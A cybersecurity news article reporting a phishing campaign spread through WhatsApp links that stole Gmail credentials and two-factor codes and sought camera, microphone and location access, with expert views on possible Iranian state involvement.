Sophisticated Gmail Phishing Attacks Spreading Via WhatsApp Links
“Recently, some WhatsApp’s Linked Sophisticated Gmail phishing attacks are taking over innocent victims.”
The campaign gained widespread attention after Iranian campaigner Nariman Gharib, who is living in the United Kingdom, revealed that he had received a dubious WhatsApp message with a link that seemed to relate to a virtual conference.
Gharib, who keeps a careful eye on the online aspects of Iran’s protest movement, provided proof of the attempt online and cautioned others against clicking on such sites.
He soon gave TechCrunch access to the complete phishing link and technical notes, enabling reporters and independent security researchers to investigate the attack’s architecture. Their investigation uncovered a sophisticated phishing scheme intended to enable real-time monitoring of victims’ devices in addition to stealing account credentials.
The revelation was made at a delicate time: while protests and deadly crackdowns continue, Iran is undergoing its longest statewide internet outage. Secure digital communication has become increasingly important and susceptible in such a setting.
Technical Analysis
| Targets were directed to a phishing website that used DuckDNS, a dynamic DNS service frequently used to conceal the actual location of servers, by the WhatsApp message delivered to Gharib.
By using this technique, attackers could create links that looked harmless but actually led visitors to dangerous websites hosted elsewhere. |
Within the Attack Chain
In the end, a domain registered in early November 2025 was found to be the source of the phishing infrastructure. The range of possible lures was expanded by related sites that followed naming patterns that implied the attackers were also posing as suppliers of virtual meeting services. The DuckDNS layer, according to investigators, assisted in disguising the phishing links as authentic WhatsApp-related sites.
Examining the phishing page’s source code provided insight into how the assault worked, even though the page itself no longer loads. In order to get passwords and two-factor authentication codes, victims were either shown phony Gmail login pages or asked for phone numbers, depending on the target.
Surveillance, Credentials, and an Exposed Server
A vulnerability on the attackers’ own servers was one of the most startling discoveries. Researchers were able to access an accessible file that recorded victim submissions in real time by changing the URL of the phishing page. The file functioned as a keylogger and held over 850 pieces of data, including usernames, passwords, unsuccessful login attempts, and two-factor codes.
A Middle Eastern professor with expertise in national security, a senior Lebanese cabinet minister, the head of an Israeli drone manufacturer, journalists, and others with ties to or residency in the United States were among the dozens of compromised victims identified by the data. The effort targeted people on Windows, macOS, iPhone, and Android devices, according to the logs.
The phishing malware allowed for device-level surveillance in addition to credential theft. After examining the code, security researcher Runa Sandvik discovered that the page asked for access to a victim’s location, microphone, and camera. Investigators did not see any media stored on the open server, but if allowed, the browser would periodically record sounds and photos and send coordinates every few seconds.
Simultaneously, some targets were presented with sites with a WhatsApp motif and QR codes. A victim’s WhatsApp account might be discreetly linked to an attacker-controlled device by scanning the code. This is a known method that takes advantage of the app’s multi-device capability and grants complete access to contacts and messages.
Cybercrime, Espionage, or Both?
The question of attribution is still open. Some experts have suggested a state-backed operation due to the campaign’s restricted targeting, emphasis on high-value individuals, and interest in surveillance data.
Gary Miller, Citizen Lab
| The action had “the hallmarks of an IRGC-linked spearphishing campaign,” alluding to the Islamic Revolutionary Guard Corps of Iran, which has a track record of conducting targeted cyberattacks. |
Others warn that it is impossible to completely rule out financial motivations. Additionally, corporate email accounts, bitcoin wallets, and other monetizable assets could be accessed with stolen Gmail credentials and two-factor codes.
Ian Campbell, Researcher, DomainTools, Domain Analysis
| Given that some domains existed months before the protests, the infrastructure is consistent with medium- to high-risk cybercrime activities. |
A hybrid possibility is also mentioned by analysts. Iran has already contracted out cyber operations to criminal organizations, a tactic that can provide plausible deniability while blurring the distinction between profit-driven hacking and espionage.
Researchers
| Accounts were successfully compromised by the campaign, and it might resurface in a different way. The experience highlights a recurrent lesson for at-risk groups as geopolitical conflict and digital repression intensify: even a convincing message on a familiar platform can be a route to intrusion, surveillance, and loss of control over one’s digital life. |
About The Author
Suraj Koli is a content specialist in technical writing about cybersecurity & information security. He has written many amazing articles related to cybersecurity concepts, with the latest trends in cyber awareness and ethical hacking. Find out more about “Him.”
Read More:
Phishing Simulation and Security Awareness: An Integrated Approach to Creating Secure Users
About Author
English